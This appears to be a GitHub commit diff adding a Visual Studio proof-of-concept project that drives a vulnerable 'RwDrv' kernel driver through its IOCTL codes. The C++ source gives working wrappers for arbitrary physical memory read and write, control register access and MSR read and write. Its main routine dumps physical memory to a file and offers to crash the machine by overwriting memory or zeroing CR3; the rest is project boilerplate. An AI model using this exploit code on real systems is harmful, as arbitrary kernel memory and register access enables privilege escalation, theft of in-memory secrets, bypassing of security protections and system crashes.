Add files via upload

hadevn · Aug 17, 2021 · ea9ff7d · ea9ff7d
1 parent 335e72b
commit ea9ff7d
Show file tree

Hide file tree

Showing 5 changed files with 382 additions and 0 deletions.
diff --git a/ArbitaryPhysRW_RegManipulation_PoC.sln b/ArbitaryPhysRW_RegManipulation_PoC.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.31515.178
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ArbitaryPhysRW_RegManipulation_PoC", "ArbitaryPhysRW_RegManipulation_PoC\ArbitaryPhysRW_RegManipulation_PoC.vcxproj", "{6472CCE7-22B7-4130-B186-B39A4BD74669}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Debug|x64.ActiveCfg = Debug|x64
+		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Debug|x64.Build.0 = Debug|x64
+		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Debug|x86.ActiveCfg = Debug|Win32
+		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Debug|x86.Build.0 = Debug|Win32
+		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Release|x64.ActiveCfg = Release|x64
+		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Release|x64.Build.0 = Release|x64
+		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Release|x86.ActiveCfg = Release|Win32
+		{6472CCE7-22B7-4130-B186-B39A4BD74669}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {78EEDB51-4A36-4BF2-B468-9D95AFAE7A58}
+	EndGlobalSection
+EndGlobal
diff --git a/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.cpp b/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.cpp
@@ -0,0 +1,178 @@
+#include <windows.h>
+#include <fstream>
+
+struct PhysRW_t
+{
+	uint64_t PhysicalAddress;
+	DWORD Size;
+	DWORD Unknown;
+	uint64_t Address;
+};
+
+struct RegRW_t
+{
+	DWORD Register;
+	uint64_t Value;
+};
+
+struct MSRRW_t
+{
+	DWORD Low;
+	DWORD Unknown;
+	DWORD Register;
+	DWORD High;
+};
+
+#define LAST_IND(x,part_type)    (sizeof(x)/sizeof(part_type) - 1)
+#define HIGH_IND(x,part_type)  LAST_IND(x,part_type)
+#define LOW_IND(x,part_type)   0
+#define DWORDn(x, n)  (*((DWORD*)&(x)+n))
+#define HIDWORD(x) DWORDn(x,HIGH_IND(x,DWORD))
+#define __PAIR64__(high, low)   (((uint64_t) (high) << 32) | (uint32_t)(low))
+
+
+class RwDrv
+{
+public:
+	RwDrv()
+	{
+		h = CreateFileA("\\\\.\\RwDrv", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
+		if (h == INVALID_HANDLE_VALUE)
+		{
+			printf("Driver Not Loaded!\n");
+			Sleep(3000);
+			exit(0);
+		}
+	}
+
+	~RwDrv()
+	{
+		CloseHandle(h);
+	}
+
+	void PhysicalRead(uint64_t Address, uint64_t* Address2, DWORD Size)
+	{
+		PhysRW_t A;
+
+		A.PhysicalAddress = Address;
+		A.Address = (uint64_t)Address2;
+		A.Unknown = 0;
+		A.Size = Size;
+
+		DeviceIoControl(h, 0x222808, &A, sizeof(A), &A, sizeof(A), 0, 0);
+	}
+
+	void PhysicalWrite(uint64_t Address, uint64_t* Address2, DWORD Size)
+	{
+		PhysRW_t A;
+
+		A.PhysicalAddress = Address;
+		A.Address = (uint64_t)Address2;
+		A.Unknown = 0;
+		A.Size = Size;
+
+		DeviceIoControl(h, 0x22280C, &A, sizeof(A), 0, 0, 0, 0);
+	}
+
+	// CR0: 0, CR2: 2, CR3: 3, CR4: 4, IRQL: 8
+	void ReadControlRegister(int Register, uint64_t* Value)
+	{
+		RegRW_t A;
+
+		A.Register = Register;
+		A.Value = 0;
+
+		DeviceIoControl(h, 0x22286C, &A, sizeof(A), &A, sizeof(A), 0, 0);
+		*Value = A.Value;
+	}
+
+	// CR0: 0, CR3: 3, CR4: 4, CR8: 8
+	// Keep in mind that this function does NOT disable interrupts, meaning writing for example cr0 will result in a bsod.
+	void WriteControlRegister(int Register, uint64_t Value)
+	{
+		RegRW_t A;
+
+		A.Register = Register;
+		A.Value = (uint64_t)&Value;
+
+		DeviceIoControl(h, 0x222870, &A, sizeof(A), &A, sizeof(A), 0, 0);
+	}
+
+	// Read and write msr is very wierd in this driver, it splits the lower and higher bits of the value in the struct.
+	void ReadMSR(int Register, uint64_t* Value)
+	{
+		MSRRW_t A;
+		A.Register = Register;
+		A.Low = 0;
+		A.High = 0;
+
+		DeviceIoControl(h, 0x222874, &A, sizeof(A), &A, sizeof(A), 0, 0);
+
+		*Value = __PAIR64__(A.High, A.Low);
+	}
+
+	void WriteMSR(int Register, uint64_t Value)
+	{
+		MSRRW_t A;
+		A.Register = Register;
+		A.Low = *(DWORD*)&Value;
+		A.High = HIDWORD(Value);
+
+		DeviceIoControl(h, 0x22284C, &A, sizeof(A), &A, sizeof(A), 0, 0);
+	}
+
+private:
+	HANDLE h;
+};
+
+
+void WriteFileToDisk(const char* FileName, uint64_t Buffer, DWORD Size)
+{
+	std::ofstream File(FileName, std::ios::binary);
+	File.write((char*)Buffer, Size);
+	File.close();
+}
+
+int main()
+{
+	RwDrv* Drv = new RwDrv();
+
+	uint64_t CR0, CR2, CR3, CR4, IRQL;
+
+	Drv->ReadControlRegister(0, &CR0);
+	Drv->ReadControlRegister(2, &CR2);
+	Drv->ReadControlRegister(3, &CR3);
+	Drv->ReadControlRegister(4, &CR4);
+	Drv->ReadControlRegister(8, &IRQL);
+
+	printf("CR0: 0x%llx\n", CR0);
+	printf("CR2: 0x%llx\n", CR2);
+	printf("CR3: 0x%llx\n", CR3);
+	printf("CR4: 0x%llx\n", CR4);
+	printf("IRQL: 0x%llx\n", IRQL);
+
+	DWORD SizeToDumpToDisk = 0xFFFF;
+	uint64_t AllocatedTempMem = (uint64_t)VirtualAlloc(0, SizeToDumpToDisk, MEM_COMMIT, PAGE_READWRITE);
+
+	// Read it in chunks of 8 bytes to save calls, you can read the entire page if you like to.
+	for (int i = 0; i < (SizeToDumpToDisk / 8); i++)
+		Drv->PhysicalRead(i * 8, (uint64_t*)(AllocatedTempMem + i * 8), 8);
+
+	WriteFileToDisk("PhysMemDmp.bin", AllocatedTempMem, SizeToDumpToDisk);
+	VirtualFree((void*)AllocatedTempMem, 0, MEM_RELEASE);
+
+
+	int Ret = MessageBoxA(0, "Would you like to bsod via writing physical memory?", "Physical Memory Write Test", MB_ICONQUESTION | MB_YESNO);
+	if (Ret == IDYES)
+	{
+		for (int i = 0; i < 0xFFFF; i++)
+			Drv->PhysicalWrite(i * 4, (uint64_t*)&SizeToDumpToDisk, 4);
+	}
+
+	Ret = MessageBoxA(0, "Would you like to bsod via writing cr3?", "Control Register Write Test", MB_ICONQUESTION | MB_YESNO);
+	if (Ret == IDYES)
+		Drv->WriteControlRegister(3, 0);
+
+
+	Sleep(-1);
+}
diff --git a/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj b/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj
@@ -0,0 +1,147 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{6472cce7-22b7-4130-b186-b39a4bd74669}</ProjectGuid>
+    <RootNamespace>ArbitaryPhysRWRegManipulationPoC</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="ArbitaryPhysRW_RegManipulation_PoC.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
diff --git a/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj.filters b/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj.filters
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="ArbitaryPhysRW_RegManipulation_PoC.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
diff --git a/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj.user b/ArbitaryPhysRW_RegManipulation_PoC/ArbitaryPhysRW_RegManipulation_PoC.vcxproj.user
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <PropertyGroup />
+</Project>